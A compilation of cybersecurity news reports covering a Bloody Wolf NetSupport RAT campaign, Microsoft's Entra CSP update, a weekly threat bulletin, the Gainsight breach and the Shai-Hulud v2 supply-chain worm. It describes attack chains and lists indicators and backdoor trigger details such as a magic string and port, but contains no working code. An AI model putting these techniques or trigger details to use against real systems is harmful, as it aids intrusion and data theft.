2025-11-28 AI创业新闻
Bloody Wolf Expands Java-based NetSupport RAT Attacks in Kyrgyzstan and Uzbekistan
The threat actor known as Bloody Wolf has been attributed to a cyber attack campaign that has targeted Kyrgyzstan since at least June 2025 with the goal of delivering NetSupport RAT. As of October 2025, the activity has expanded to also single out Uzbekistan, Group-IB researchers Amirbek Kurbanov and Volen Kayo said in a report published in collaboration with Ukuk, a state enterprise under the Prosecutor General’s office of the Kyrgyz Republic. The attacks have targeted finance, government, and information technology (IT) sectors. “Those threat actors would impersonate the [Kyrgyzstan’s] Ministry of Justice through official looking PDF documents and domain names, which in turn hosted malicious Java Archive (JAR) files designed to deploy the NetSupport RAT,” the Singapore-headquartered company said .
“This combination of social engineering and accessible tooling allows Bloody Wolf to remain effective while keeping a low operational profile.” Bloody Wolf is the name assigned to a hacking group of unknown provenance that has used spear-phishing attacks to target entities in Kazakhstan and Russia using tools like STRRAT and NetSupport. The group is assessed to be active since at least late 2023. The targeting of Kyrgyzstan and Uzbekistan using similar initial access techniques marks an expansion of the threat actor’s operations in Central Asia, primarily impersonating trusted government ministries in phishing emails to distribute weaponized links or attachments. The attack chains more or less follow the same approach in that the message recipients are tricked into clicking on links that download malicious Java archive (JAR) loader files along with instructions to install Java Runtime.
While the email claims the installation is necessary to view the documents, the reality is that it’s used to execute the loader. Once launched, the loader then proceeds to fetch the next-stage payload (i.e., NetSupport RAT) from infrastructure that’s under the attacker’s control and set up persistence in three ways - Creating a scheduled task Adding a Windows Registry value Dropping a batch script to the folder “%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup” The Uzbekistan phase of the campaign is notable for incorporating geofencing restrictions, thereby causing requests originating outside of the country to be redirected to the legitimate data.egov[.]uz website. Requests from within Uzbekistan have been found to trigger the download of the JAR file from an embedded link within the PDF attachment. Group-IB said the JAR loaders observed in the campaigns are built with Java 8, which was released in March 2014.
It’s believed that the attackers are using a bespoke JAR generator or template to spawn these artifacts. The NetSupport RAT payload is a old version of NetSupport Manager from October 2013. “Bloody Wolf has demonstrated how low-cost, commercially available tools can be weaponized into sophisticated, regionally targeted cyber operations,” it said. “By exploiting trust in government institutions and leveraging simple JAR-based loaders, the group continues to maintain a strong foothold across the Central Asian threat landscape.” Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Microsoft to Block Unauthorized Scripts in Entra ID Logins with 2026 CSP Update
Microsoft has announced plans to improve the security of Entra ID authentication by blocking unauthorized script injection attacks starting a year from now. The update to its Content Security Policy (CSP) aims to enhance the Entra ID sign-in experience at “login.microsoftonline[.]com” by only letting scripts from trusted Microsoft domains run. “This update strengthens security and adds an extra layer of protection by allowing only scripts from trusted Microsoft domains to run during authentication, blocking unauthorized or injected code from executing during the sign-in experience,” the Windows maker said . Specifically, it only allows script downloads from Microsoft trusted CDN domains and inline script execution from a Microsoft trusted source.
The updated policy is limited to browser-based sign-in experiences for URLs beginning with login.microsoftonline.com. Microsoft Entra External ID will not be affected. The change, which has been described as a proactive measure, is part of Microsoft’s Secure Future Initiative ( SFI ) and is designed to safeguard users against cross-site scripting (XSS) attacks that make it possible to inject malicious code into websites. It’s expected to be rolled out globally starting mid-to-late October 2026.
Microsoft is urging organizations to test their sign-in flows thoroughly ahead of time to ensure that there are no issues and the sign-in experience has no friction. It’s also advising customers to refrain from using browser extensions or tools that inject code or script into the Microsoft Entra sign-in experience. Those who follow this approach are recommended to switch to other tools that don’t inject code. To identify any CSP violations, users can go through a sign-in flow with the dev console open and access the browser’s Console tool within the developer tools to check for errors that say “Refused to load the script” for going against the “ script-src “ and “ nonce “ directives.
Microsoft’s SFI is a multi-year effort that seeks to put security above all else when designing new products and better prepare for the growing sophistication of cyber threats. It was first launched in November 2023 and expanded in May 2024 following a report from the U.S. Cyber Safety Review Board (CSRB), which concluded that the company’s “security culture was inadequate and requires an overhaul.” In its third progress report published this month, the tech giant said it has deployed over 50 new detections in its infrastructure to target high-priority tactics, techniques, and procedures, and that the adoption of phishing-resistant multi-factor authentication (MFA) for users and devices has hit 99.6%. Other notable changes enacted by Microsoft are as follows - Enforced Mandatory MFA across all services, including for all Azure service users Introduced Automatic recovery capabilities via Quick Machine Recovery, expanded passkey and Windows Hello support, and improved memory safety in UEFI firmware and drivers by using Rust Migrated 95% of Microsoft Entra ID signing VMs to Azure Confidential Compute and moved 94.3% of Microsoft Entra ID security token validation to its standard identity Software Development Kit (SDK) Discontinued the use of Active Directory Federation Services (ADFS) in our productivity environment Decommissioned 560,000 additional unused and aged tenants and 83,000 unused Microsoft Entra ID apps across Microsoft production and productivity environments Advanced threat hunting by centrally tracking 98% of production infrastructure Achieved complete network device inventory and mature asset lifecycle management Almost entirely locked code signing to production identities Published 1,096 CVEs, including 53 no-action cloud CVEs, and paid out $17 million in bounties “To align with Zero Trust principles, organizations should automate vulnerability detection, response, and remediation using integrated security tools and threat intelligence,” Microsoft said.
“Maintaining real-time visibility into security incidents across hybrid and cloud environments enables faster containment and recovery.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Webinar: Learn to Spot Risks and Patch Safely with Community-Maintained Tools
If you’re using community tools like Chocolatey or Winget to keep systems updated, you’re not alone. These platforms are fast, flexible, and easy to work with—making them favorites for IT teams. But there’s a catch… The very tools that make your job easier might also be the reason your systems are at risk.
These tools are run by the community. That means anyone can add or update packages. Some packages may be old, missing safety checks, or changed by mistake or on purpose. Hackers look for these weak spots.
This has already happened in places like NPM and PyPI. The same risks can happen with Windows tools too. To help you patch safely without slowing down, there’s a free webinar coming up . It’s led by Gene Moody, Field CTO at Action1 .
He’ll walk through how these tools work, where the risks are, and how to protect your systems while keeping updates on track. In this session, he’ll test how safe these tools really are. You’ll get practical steps you can use right away—nothing theoretical, just what works. The goal is not to scare you away from community tools.
They’re useful. But they need guardrails—rules that help you use them safely without slowing you down. You will learn: 🔒 How to spot hidden risks ⚙️ How to set safety checks like source pinning, allow-lists, and hash/signature verification 📊 How to prioritize updates using known vulnerability data (KEV) 📦 How to choose between community tools, direct vendor sources, or a mix of both If you’re not sure when to use community repos and when to go straight to the vendor, this session will help you decide. You’ll also see how to mix both in a safe way.
This webinar is for anyone who manages software updates—whether you’re on a small team or a large one. If you’ve ever wondered what’s really inside that next patch, this session is for you. It’s free to attend, and you’ll leave with clear actions you can apply the same day. Save your spot here .
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
ThreatsDay Bulletin: AI Malware, Voice Bot Flaws, Crypto Laundering, IoT Attacks — and 20 More Stories
Hackers have been busy again this week. From fake voice calls and AI-powered malware to huge money-laundering busts and new scams, there’s a lot happening in the cyber world. Criminals are getting creative — using smart tricks to steal data, sound real, and hide in plain sight. But they’re not the only ones moving fast.
Governments and security teams are fighting back, shutting down fake networks, banning risky projects, and tightening digital defenses. Here’s a quick look at what’s making waves this week — the biggest hacks, the new threats, and the wins worth knowing about. Mirai-based malware resurfaces with new IoT campaign ShadowV2 Botnet Continues to Target IoT Devices The threat actors behind the Mirai-based ShadowV2 botnet have been observed infecting IoT devices across industries and continents. The campaign is said to have been active only during the Amazon Web Services (AWS) outage in late October 2025.
It’s assessed that the activity was “likely a test run conducted in preparation for future attacks,” per Fortinet . The botnet exploited several flaws, including CVE-2009-2765 (DDWRT), CVE-2020-25506 , CVE-2022-37055 , CVE-2024-10914 , CVE-2024-10915 (D-Link), CVE-2023-52163 (DigiEver), CVE-2024-3721 (TBK), and CVE-2024-53375 (TP-Link), to recruit susceptible gear into a zombie army of IoT devices. A successful exploitation is followed by the execution of a downloader shell script that delivers the ShadowV2 malware for subsequent DDoS attacks. “IoT devices remain a weak link in the broader cybersecurity landscape,” the company said.
“The evolution of ShadowV2 suggests a strategic shift in the targeting behavior of threat actors toward IoT environments.” It’s not just ShadowV2. Another DDoS botnet named RondoDox , also based on Mirai, has weaponized over a dozen exploits to target IoT devices. “Attackers are not only motivated to target vulnerable IoT devices, but also how, if successful, they will take over previously infected devices to add them to their own botnets,” F5 said . Singapore tightens messaging rules to fight spoof scams Singapore Orders Apple and Google to Block Messages that Spoof Government Orgs Singapore has ordered Apple and Google to block or filter messages on iMessage and RCS-supported Messages app for Android that masquerade as government agencies, requiring the company to implement new anti-spoofing protections starting December 2025 as part of efforts to curb rising online scams.
According to Straits Times , Apple has been issued a directive under the Online Criminal Harms Act, requiring the tech giant to prevent iMessage accounts and group chats from using names that mimic Singapore government agencies or the “gov.sg” sender ID. Tor bolsters privacy with new encryption upgrade Tor Switches to New Counter Galois Onion Relay Encryption Algorithm The developers behind the Tor project are preparing a major upgrade called Counter Galois Onion ( CGO ), which replaces the long-standing relay encryption method used across the anonymity network. “It’s based on a kind of construction called a Rugged Pseudorandom Permutation (RPRP): essentially, it’s a design for a wide-block cipher that resists malleability in one direction (for the encrypt operation, but not the decrypt operation),” the Tor Project said . “If we deploy this so that clients always decrypt and relays always encrypt, then we have a tagging-resistant cipher at less cost than a full SPRP [strong pseudorandom permutation]!” The updates aim to raise the cost of active attacks along a circuit, such as tagging and traffic-interception attacks, as well as prevent bad actors from tampering with encrypted traffic, add forward secrecy, and make the network more resilient.
Report shows surge in phishing during 2025 shopping season Kaspersky Flags 6.4 Million Phishing Attacks in 2025 Kaspersky said it identified nearly 6.4 million phishing attacks, which targeted users of online stores, payment systems, and banks in the first ten months of 2025. “As many as 48.2% of these attacks were directed at online shoppers,” it said, adding it “detected more than 2 million phishing attacks related to online gaming” and “blocked more than 146,000 Black Friday-themed spam messages in the first two weeks of November.” Stealthy malware targets OpenFind mail servers ESET Finds New QuietEnvelope Malware ESET has disclosed details of a new toolset dubbed QuietEnvelope that’s specifically developed to target the MailGates email protection system of OpenFind email servers. The toolset comprises Perl scripts and three stealthy backdoors, among other miscellaneous files. “The Perl scripts are mainly responsible for deploying three passive backdoors as a loadable kernel module (LKM), an Apache module, and an injected shellcode,” ESET said .
“Together, they enable the attackers to have remote access to a compromised server.” The LKM component (“smtp_backdoor”) monitors ingress TCP traffic on port 6400 and triggers when packets contain the magic string EXEC_OPENFIND to execute the command. “The Apache module expects the command, which is executed via popen, in the custom HTTP header OpenfindMaster,” it added. “The third backdoor is injected into a running mgsmtpd process. It is capable of retrieving file content and executing commands.
By default, it responds with 250 OK, suggesting that the backdoor is hooked into the code that is maybe responsible for generating the SMTP response.” The tool is believed to be the work of an unknown state-sponsored threat actor, given the sophistication and its ability to blend in. ESET said it found debug strings written in simplified Chinese, which is mainly used in Mainland China. Russia-linked hackers abuse MSC flaw for stealthy infection Water Gamayun Exploits MSC EvilTwin Flaw A Bing search for “belay” leads to the website “belaysolutions[.]com,” which is said to have been compromised with malicious JavaScript that performs a silent redirect to “belaysolutions[.]link” that hosts a double-extension RAR payload disguised as a PDF. Opening the initial payload exploits MSC EvilTwin (CVE-2025-26633) to inject code into mmc.exe, ultimately leading to the deployment of a loader executable that’s capable of installing backdoors or stealers.
“When run, mmc.exe resolves MUI paths that load the malicious snap-in instead of the legitimate one, triggering embedded TaskPad commands with an encoded PowerShell payload,” Zscaler said . “Decoded via -EncodedCommand, this script downloads UnRAR[.]exe and a password-protected RAR, extracts the next stage, waits briefly, then Invoke-Expression on the extracted script.” The second script displays a decoy PDF and downloads and executes the loader binary. The exact nature of the payload is unclear due to the fact that the command-and-control (C2) infrastructure is unresponsive. The attack chain has been attributed to a Russia-aligned APT group known as Water Gamayun (aka EncryptHub).
NCA uncovers crypto laundering tied to Russian sanctions evasion U.K. Exposes Billion-Dollar Money Laundering Network The U.K. has exposed two companies, Smart and TGR, which laundered money from cybercrime, drugs trade, firearms smuggling, and immigration crime for a fee, to create “clean” cryptocurrency that the Russian state could then use to evade international sanctions. The National Crime Agency (NCA) said the two entities acquired a bank in Kyrgyzstan to pose as legitimate operations.
The network is known to operate in at least 28 U.K. cities and towns. “Smart and TGR collaborated to launder money for transnational crime groups involved in cybercrime, drugs, and firearms smuggling,” the NCA said . “They also helped their Russian clients to illegally bypass financial restrictions to invest money in the U.K., threatening the integrity of our economy.” Defender update removes lingering malicious invites Microsoft Takes Action on Malicious Calendar Invites Microsoft said it has updated Defender for Office 365 to help security teams remove calendar entries automatically created by Outlook during email delivery.
While remediation actions such as Move to Junk, Delete, Soft Delete, and Hard Delete can be used to eliminate email threats from users’ inboxes, the actions did not touch the calendar entry created by the original invite. “With this update, we’re taking the first step toward closing that gap,” the company said . “Hard Delete will now also remove the associated calendar entry for any meeting invite email. This ensures threats are fully eradicated—not just from the inbox but also from the calendar—reducing the risk of user interaction with malicious content.” Thailand cracks down on Worldcoin-style biometric collection Thailand Bans World Iris Scans Data regulators in Thailand have ordered TIDC Worldverse , which presents the Sam Altman-founded startup, Tools for Humanity, in the country, to stop the collection of iris biometrics in exchange for World (formerly Worldcoin) cryptocurrency payments.
It has also demanded the deletion of biometric data already collected from 1.2 million Thai citizens. The project has witnessed similar bans in Brazil, the Philippines, Indonesia, and Kenya. 21-year-old cybersecurity specialist detained over state criticism Russia Arrests Tech Entrepreneur for Treason Timur Kilin, a 21-year-old tech entrepreneur and cybersecurity specialist, was arrested in Moscow on treason charges late last week. While the details of the case are unknown, it’s suspected that Kilin may have attracted the attention of authorities after criticizing the state-backed messaging app Max and the government’s anti-cybercrime legislation.
Chinese-speaking group expands global smishing reach to Egypt Smishing Triad Targets Egypt’s Financial Sector and Postal Services Threat actors associated with the Smishing Triad have expanded their focus to target Egypt by setting up malicious domains impersonating major Egyptian service providers, including Fawry, the Egypt Post, and Careem. The Smishing Triad is a Chinese-speaking cybercriminal group specializing in large-scale smishing campaigns across the world using a phishing kit named Panda. “Beyond U.S. service impersonation, the smishing kit offers a wide range of international templates, including those that mimic prominent ISPs such as Du (U.A.E.),” Dark Atlas said .
“These templates are designed to harvest PII from victims across different regions, significantly expanding the campaign’s global reach.” Recently, Google filed a civil lawsuit in the U.S. District Court for the Southern District of New York (SDNY) against a massive Phishing-as-a-Service (PhaaS) platform called Lighthouse that has ensnared over 1 million users across 120 countries. Lighthouse is one of the PhaaS services used by the Smishing Triad. The PhaaS kits are primarily distributed through Telegram by a threat actor named Wang Duo Yu (@wangduoyu8).
Privacy service ends after ties to data broker controversy Mozilla to Shut Down Monitor Plus Mozilla has announced plans to shut down Monitor Plus, a service that allowed user data to be removed from data broker portals. The service will wind down on December 17, 2025. It was offered through a partnership with Onerep, a controversial company whose Belarusian CEO, Dimitiri Shelest, was caught running dozens of people search engine services since 2010. “Mozilla Monitor’s free monitoring service will continue to provide real-time alerts and step-by-step guides to mitigate the risks of a data breach,” Mozilla said.
Phishing campaigns drop RATs on Russian corporate targets NetMedved Targets Russian Firms with RATs A new threat actor named NetMedved is targeting Russian companies with phishing emails containing ZIP archives that include a LNK file masquerading as a purchase request, along with other decoy documents. Opening the LNK file triggers a multi-stage infection sequence that drops NetSupport RAT. The activity, per Positive Technologies , was observed in mid-October 2025. The development comes as F6 detailed new attacks mounted by VasyGrek (aka Fluffy Wolf ), a Russian-speaking e-crime actor known for striking Russian companies since 2016 to deliver remote access trojans (RATs) and stealer malware.
The latest set of attacks recorded between August and November 2025 involved the use of the Pay2Key ransomware, as well as malware developed by PureCoder , including PureCrypter, PureHVNC, and PureLogs Stealer. Blockchain-hosted payloads deliver AMOS, Vidar, Lumma stealers Attacks Exploit EtherHiding and ClickFix to Drop Infostealers Threat actors are using legitimate websites compromised with malicious JavaScript injects to serve site visitors fake CAPTCHA checks that contain a Base64-encoded payload to display a ClickFix lure that’s appropriate for the operating system by using the EtherHiding technique. This involves hiding intermediate JavaScript payloads on the blockchain and using four smart contracts deployed on the Binance Smart Chain (BSC) to ensure that the victim is not a bot and direct them to an operating system (OS)-specific contract. However, the OS-specific JavaScript is delivered only after a call to a gate contract that responds either “yes” or another value.
“This gate provides the attacker with a remotely controlled feature flag,” Censys said . “By altering on-chain state, the operator can selectively enable or disable delivery for specific victims, throttle execution, or temporarily disable the entire campaign.” The payloads distributed throughout chains include common stealers like AMOS and Vidar. Similar drive-by compromise attacks have also been found to display counterfeit CAPTCHA verifications that leverage the ClickFix tactic to drop Lumma Stealer, according to NCC Group . Microsoft links 13M phishing emails to top PhaaS operation Tycoon 2FA Becomes the Most Active PhaaS Platform Microsoft said the PhaaS toolkit known as Tycoon 2FA (aka Storm-1747) has emerged as the most prolific platform observed by the company this year.
In October 2025 alone, Microsoft Defender for Office 365 blocked more than 13 million malicious emails linked to Tycoon 2FA. “More than 44% of all CAPTCHA-gated phishing attacks blocked by Microsoft were attributed to Tycoon 2FA,” it said . “Tycoon2FA was also directly linked to nearly 25% of all QR code phishing attacks detected in October.” First discovered in 2023, Tycoon 2FA has evolved into a potent tool that leverages real-time Adversary-in-the-Middle (AitM) techniques to capture credentials, steal session tokens, and one-time codes. “The platform delivers high-fidelity phishing pages for Microsoft 365, Gmail, and Outlook, and has become a preferred tool among threat actors due to its subscription-based, low-barrier operational model,” CYFIRMA said .
Malware uses AI mimicry to bypass behavioral defenses Xillen Stealer Updated to Evade AI Detection A new version of Xillen Stealer has introduced advanced features to evade AI-based detection systems by mimicking legitimate users and adjusting CPU and memory usage to imitate normal apps. Its main goal is to steal credentials, cryptocurrency, and sensitive data across browsers, password managers, and cloud environments. It’s marketed on Telegram for anywhere between $99 to $599 per month. The latest iteration also includes code to use AI to detect high-value targets based on weighted indicators and relevant keywords defined in a dictionary.
These include cryptocurrency wallets, banking data, premium accounts, developer accounts, and business emails, along with location indicators that include high-value countries such as the U.S., the U.K., Germany, and Japan, and other cryptocurrency-friendly countries and financial hubs. While the feature is not fully implemented by its authors, Xillen Killers, the development shows how threat actors could be leveraging AI in future campaigns, Darktrace said . FCC reverses course on telecom cybersecurity policy FCC Scraps Telecom Cybersecurity Rules The Federal Communications Commission (FCC) has scrapped a set of telecom cybersecurity rules introduced after the Salt Typhoon espionage campaign came to light last year to prevent state-sponsored hackers from breaching American carriers. The ruling came into effect in January 2025.
The course reversal comes after what the FCC said were “extensive, urgent, and coordinated efforts” from carriers to mitigate operational risks and better protect consumers. The action follows “months-long engagement with communications service providers where they have demonstrated a strengthened cybersecurity posture following Salt Typhoon,” the agency added , adding it has “taken a series of actions to harden communications networks and improve their security posture to enhance the agency’s investigative process into communications networks outages that result from cyber incidents.” This included establishing a Council on National Security and adopting rules to address cybersecurity risks to critical communications infrastructure without “imposing inflexible and ambiguous requirements.” However, the FCC’s announcement offers no details on how those improvements will be monitored or enforced. Teen suspects deny charges in Transport for London hack British Teens Plead Not Guilty to TfL Attack Two British teenagers who were charged with Computer Misuse Act offenses over a cyber attack on Transport for London (TfL) last year pleaded not guilty during a court appearance last week. Thalha Jubair, 19, and Owen Flowers, 18, were arrested at their homes in East London and Walsall, respectively, by officers from the National Crime Agency (NCA) in September 2025.
Unpatched flaw lets AI voice agents enable large-scale scams Security Flaw in Retell AI API A security vulnerability has been disclosed in the Retell AI API , which creates AI voice agents that have excessive permissions and functionality. This stems from a lack of sufficient guardrails that causes its large language model (LLM) to deliver unintended outputs. An attacker could exploit this behavior to stage large-scale social engineering, phishing, and misinformation campaigns. “The vulnerability targets Retell AI’s ease of deployment and customizability to perform scalable phishing/social engineering attacks,” the CERT Coordination Center (CERT/CC) said .
“Attackers can feed publicly available resources as well as some instructions to Retell AI’s API to generate high-volume and automated fake calls. These fake calls could lead to unauthorized actions, security breaches, data leaks, and other forms of manipulation.” The issue remains unpatched. Study shows cybercriminal job market mirrors real-world economy What’s the Dark Web Job Market Like? A new analysis from Kaspersky has revealed that the dark web continues to serve as a parallel labor market with its own rules, recruitment practices, and salary expectations, while also being influenced by current economic forces.
“The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work,” the company said . “At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers, and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.” Android malware hides traffic behind hacked legitimate sites Malicious Apps Use Compromised Legit Websites as C2 AhnLab said it discovered an Android APK malware (“com.golfpang.golfpanggolfpang”) impersonating a famous Korean delivery service, while taking steps to evade security controls using obfuscation and packing techniques.
The data stolen by the malware is exfiltrated to a breached legitimate site that’s used for C2. “When the app is launched, it requests the permissions required to perform malicious behaviors from the user,” AhnLab said. In a similar development, a malicious program disguised as SteamCleaner is being propagated via websites that advertise cracked software to deliver a Node.js script capable of communicating with a C2 server periodically and executing commands issued by the attacker. While it’s not known what commands are sent via the C2 channel, AhnLab said the activity could lead to the installation of proxyware and other payloads.
The counterfeit installers are hosted on GitHub repositories managed by the threat actor. ASIO chief warns of state-backed cyber threats to critical systems Australian Spy Chief Warns of Cyber Sabotage Director-General of Security Mike Burgess, the head of Australia’s Security Intelligence Organisation (ASIO), disclosed that threat actors operating on behalf of China’s government and military probed the country’s telecoms network and key infrastructure. Burgess warned that authoritarian regimes “are growing more willing to disrupt or destroy critical infrastructure” using cyber sabotage. Espionage is estimated to have cost the country A$12.5 billion ($8.1 billion) in 2024.
However, China has dismissed the remarks, stating they “spread false narratives and deliberately provoked confrontation.” Fake mayor jailed for life over massive cyber scam ring Philippines Sentences Chinese Woman to Jail for Running Scam Compound Alice Guo, a 35-year-old Chinese woman who posed as a local and was elected as mayor for the city of Bamban in 2022, was sentenced to life in prison after she was found guilty of human trafficking for her role in running a huge cyber scam compound that was operating under online casinos, known locally as Philippine Offshore Gaming Operations (Pogo). Guo, along with three others, was sentenced to life in prison and a fine of 2 million pesos ($33,832). Old Windows protocol remains key target for credential theft Threat Actors Continue to Abuse NTLM Multiple vulnerabilities in Microsoft Windows have been exploited by threat actors to leak NTLM hashes and augment their post-exploitation efforts. These include CVE-2024-43451 , which has been abused by BlindEagle and Head Mare, CVE-2025-24054 , which has been abused in phishing attacks targeting Russia to deliver Warzone RAT, and CVE-2025-33073 , which has been abused in “suspicious activity” against an unnamed target belonging to the financial sector in Uzbekistan.
In this attack, the threat actor exploited the flaw to check if they had sufficient privileges to execute code using batch files that ran reconnaissance commands, establish persistence, dump LSASS memory, and unsuccessfully attempt to move laterally to the administrative share of another host. No further activity was detected. “While Microsoft has announced plans to phase it out, the protocol’s pervasive presence across legacy systems and enterprise networks keeps it relevant and vulnerable,” Kaspersky said . “Threat actors are actively leveraging newly disclosed flaws to refine credential relay attacks, escalate privileges, and move laterally within networks, underscoring that NTLM still represents a major security liability.” That’s a wrap for this week’s ThreatsDay.
The big picture? Cybercrime is getting faster, smarter, and harder to spot — but awareness still beats panic. Keep your software updated, stay alert for anything that feels off, and don’t click in a hurry. The more we all stay sharp, the harder it gets for attackers to win.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Gainsight Expands Impacted Customer List Following Salesforce Security Alert
Gainsight has disclosed that the recent suspicious activity targeting its applications has affected more customers than previously thought. The company said Salesforce initially provided a list of 3 impacted customers and that it has “expanded to a larger list” as of November 21, 2025. It did not reveal the exact number of customers who were impacted, but its CEO, Chuck Ganapathi, said “we presently know of only a handful of customers who had their data affected.” The development comes as Salesforce warned of detected “unusual activity” related to Gainsight-published applications connected to the platform, prompting the company to revoke all access and refresh tokens associated with them. The breach has been claimed by a notorious cybercrime group known as ShinyHunters (aka Bling Libra).
A number of other precautionary steps have been enacted to contain the incident. This includes Zendesk, Gong.io, and HubSpot temporarily suspending their Gainsight integrations, and Google disabling OAuth clients with callback URIs like gainsightcloud[.]com. HubSpot, in its own advisory, said it found no evidence to suggest any compromise of its own infrastructure or customers. In an FAQ, Gainsight has also listed the products for which the ability to read and write from Salesforce has been temporarily unavailable - Customer Success (CS) Community (CC) Northpass - Customer Education (CE) Skilljar (SJ) Staircase (ST) The company, however, emphasized that Staircase is not affected by the incident and that Salesforce removed the Staircase connection out of caution in response to an ongoing investigation.
Both Salesforce and Gainsight have published indicators of compromise (IoCs) associated with the breach, with one user agent string, “Salesforce-Multi-Org-Fetcher/1.0”, used for unauthorized access, also flagged as previously employed in the Salesloft Drift activity. According to information from Salesforce, reconnaissance efforts against customers with compromised Gainsight access tokens were first recorded from the IP address “3.239.45[.]43” on October 23, 2025, followed by subsequent waves of reconnaissance and unauthorized access starting November 8. To further secure their environments, customers are asked to follow the steps below - Rotate the S3 bucket access keys and other connectors like BigQuery, Zuora, Snowflake etc., used for connections with Gainsight Log in to Gainsight NXT directly, rather than through Salesforce, until the integration is fully restored Reset NXT user passwords for any users who do not authenticate via SSO. Re-authorize any connected applications or integrations that rely on user credentials or tokens “These steps are preventative in nature and are designed to ensure your environment remains secure while the investigation continues,” Gainsight said.
The development comes against the backdrop of a new ransomware-as-a-service (RaaS) platform called ShinySp1d3r (also spelled Sh1nySp1d3r) that’s being developed by Scattered Spider, LAPSUS$, and ShinyHunters (SLSH). Data from ZeroFox has revealed that the cybercriminal alliance has been responsible for at least 51 cyberattacks over the past year. “While the ShinySp1d3r encryptor has some features common to other encryptors, it also boasts features that have never been seen before in the RaaS space,” the company said. “These include: Hooking the EtwEventWrite function to prevent Windows Event Viewer logging, terminating processes that keep files open – which would normally prevent encryption – by iterating over processes before killing them, [and] filling free space in a drive by writing random data contained in a .tmp file, likely to overwrite any deleted files.” ShinySp1d3r also comes with the ability to search for open network shares and encrypt them, as well as propagate to other devices on the local network through deployViaSCM, deployViaWMI, and attemptGPODeployment.
In a report published Wednesday, independent cybersecurity journalist Brian Krebs said the individual responsible for releasing the ransomware is a core SLSH member named “Rey” (aka @ReyXBF ), who is also one of the three administrators of the group’s Telegram channel. Rey was previously an administrator of BreachForums and the data leak website for HellCat ransomware . Rey, whose identity has been unmasked as Saif Al-Din Khader, told Krebs that ShinySp1d3r is a rehash of HellCat that has been modified with artificial intelligence (AI) tools and that he has been cooperating with law enforcement since at least June 2025. “The emergence of a RaaS program, in conjunction with an EaaS [extortion-as-a-service] offering, makes SLSH a formidable adversary in terms of the wide net they can cast against organizations using multiple methods to monetize their intrusion operations,” Palo Alto Networks Unit 42 researcher Matt Brady said .
“Additionally, the insider recruitment element adds yet another layer for organizations to defend against.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
The Practical Playbook for Secure AI Adoption
Shai-Hulud v2 Spreads From npm to Maven, as Campaign Exposes Thousands of Secrets
The second wave of the Shai-Hulud supply chain attack has spilled over to the Maven ecosystem after compromising more than 830 packages in the npm registry. The Socket Research Team said it identified a Maven Central package named org.mvnpm:posthog-node:4.18.1 that embeds the same two components associated with Sha1-Hulud: the “setup_bun.js” loader and the main payload “bun_environment.js.” The company told The Hacker News that org.mvnpm:posthog-node:4.18.1 was the only Java package identified so far. “This means the PostHog project has compromised releases in both the JavaScript/npm and Java/Maven ecosystems, driven by the same Shai Hulud v2 payload,” the cybersecurity company said in a Tuesday update. It’s worth noting that the Maven Central package is not published by PostHog itself.
Rather, the “org.mvnpm” coordinates are generated via an automated mvnpm process that rebuilds npm packages as Maven artifacts. The Maven Central said they are working to implement extra protections to prevent already known compromised npm components from being rebundled. As of November 25, 2025, 22:44 UTC, all mirrored copies have been purged. The development comes as the “second coming” of the supply chain incident has targeted developers globally with an aim to steal sensitive data like API keys, cloud credentials, and npm and GitHub tokens, and facilitate deeper supply chain compromise in a worm-like fashion.
The latest iteration has also evolved to be more stealthy, aggressive, scalable, and destructive. Besides borrowing the overall infection chain of the initial September variant, the attack allows threat actors to gain unauthorized access to npm maintainer accounts and publish trojanized versions of their packages. When unsuspecting developers download and run these libraries, the embedded malicious code backdoors their own machines and scans for secrets and exfiltrates them to GitHub repositories using the stolen tokens. The attack accomplishes this by injecting two rogue workflows , one of which registers the victim machine as a self-hosted runner and enables arbitrary command execution whenever a GitHub Discussion is opened.
A second workflow is designed to systematically harvest all secrets. Over 28,000 repositories have been affected by the incident. “This version significantly enhances stealth by utilizing the Bun runtime to hide its core logic and increases its potential scale by raising the infection cap from 20 to 100 packages,” Cycode’s Ronen Slavin and Roni Kuznicki said . “It also uses a new evasion technique, exfiltrating stolen data to randomly named public GitHub repositories instead of a single, hard-coded one.” The attacks illustrate how trivial it is for attackers to take advantage of trusted software distribution pathways to push malicious versions at scale and compromise thousands of downstream developers.
What’s more, the self-replication nature of the malware means a single infected account is enough to amplify the blast radius of the attack and turn it into a widespread outbreak in a short span of time. Further analysis by Aikido has uncovered that the threat actors exploited vulnerabilities, specifically focusing on CI misconfigurations in pull_request_target and workflow_run workflows, in existing GitHub Actions workflows to pull off the attack and compromise projects associated with AsyncAPI, PostHog, and Postman. The vulnerability “used the risky pull_request_target trigger in a way that allowed code supplied by any new pull request to be executed during the CI run,” security researcher Ilyas Makari said. “A single misconfiguration can turn a repository into a patient zero for a fast-spreading attack, giving an adversary the ability to push malicious code through automated pipelines you rely on every day.” It’s assessed that the activity is the continuation of a broader set of attacks targeting the ecosystem that commenced with the August 2025 S1ngularity campaign impacting several Nx packages on npm.
“As a new and significantly more aggressive wave of npm supply chain malware, Shai-Hulud 2 combines stealthy execution, credential breadth, and fallback destructive behavior, making it one of the most impactful supply chain attacks of the year,” Nadav Sharkazy, a product manager at Apiiro , said in a statement. “This malware shows how a single compromise in a popular library can cascade into thousands of downstream applications by trojanizing legitimate packages during installation.” Data compiled by GitGuardian , OX Security , and Wiz shows that the campaign has leaked hundreds of GitHub access tokens and credentials associated with Amazon Web Services (AWS), Google Cloud, and Microsoft Azure. More than 5,000 files were uploaded to GitHub with the exfiltrated secrets. GitGuardian’s analysis of 4,645 GitHub repositories has identified 11,858 unique secrets, out of which 2,298 remained valid and publicly exposed as of November 24, 2025.
